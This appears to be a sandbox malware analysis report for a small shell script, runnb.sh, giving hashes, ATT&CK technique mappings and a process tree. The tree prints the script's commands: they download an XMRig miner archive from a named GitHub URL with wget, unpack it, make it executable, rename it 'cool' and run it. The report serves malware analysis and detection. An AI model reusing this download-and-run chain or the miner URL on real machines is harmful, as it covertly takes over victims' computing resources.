a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

credential_access defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

1649 chmod
OS Credential Dumping 1 TTPs 1 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
credential_access

/etc/passwd and /etc/shadow
T1003.008

Processes:

sudo

description ioc process

File opened for reading /etc/shadow sudo
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

1578 sudo

pid	process
1649	chmod

description	ioc	process
File opened for reading	/etc/shadow	sudo

pid	process
1578	sudo

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

snapsnapsnapsnapsnapsnapsnapsnap

description	ioc	process
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	snap

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

aptsnapdpkgsnapsudodpkgsnapmvsnapaptdpkgsnapsnapsnapdpkgsnaptar

description	ioc	process
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/1/limits	sudo
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/cmdline	snap
File opened for reading	/proc/cgroups	snap
File opened for reading	/proc/cmdline	snap

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:1577

/usr/bin/sudo
sudo apt install wget
2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:1578

/usr/bin/apt
apt install wget
3⤵
- Reads runtime system information
PID:1579

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
4⤵
- Reads runtime system information
PID:1580

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
4⤵
- Reads runtime system information
PID:1584

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
4⤵
PID:1585

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1586

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
4⤵
PID:1591

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1592

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
4⤵
PID:1597

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1598

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
4⤵
PID:1604

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
5⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1605

/usr/bin/apt
apt install wget
2⤵
- Reads runtime system information
PID:1610

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1611

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:1612

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
3⤵
PID:1613

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1614

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
3⤵
PID:1622

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1623

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
3⤵
PID:1631

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1632

/bin/sh
/bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
3⤵
PID:1640

/usr/bin/snap
/usr/bin/snap advise-snap --from-apt
4⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1641

/usr/bin/wget
wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
2⤵
PID:1647

/usr/bin/tar
tar xvf xmrigtar.tar.gz
2⤵
- Reads runtime system information
PID:1648

/usr/bin/chmod
chmod +x xmrig
2⤵
- File and Directory Permissions Modification
PID:1649

/usr/bin/mv
mv xmrig cool
2⤵
- Reads runtime system information
PID:1650

/tmp/cool
./cool
2⤵
PID:1651

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Sudo and Sudo Caching

1

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Sudo and Sudo Caching

1

T1548.003

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

OS Credential Dumping

1

T1003

/etc/passwd and /etc/shadow

1

T1003.008

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads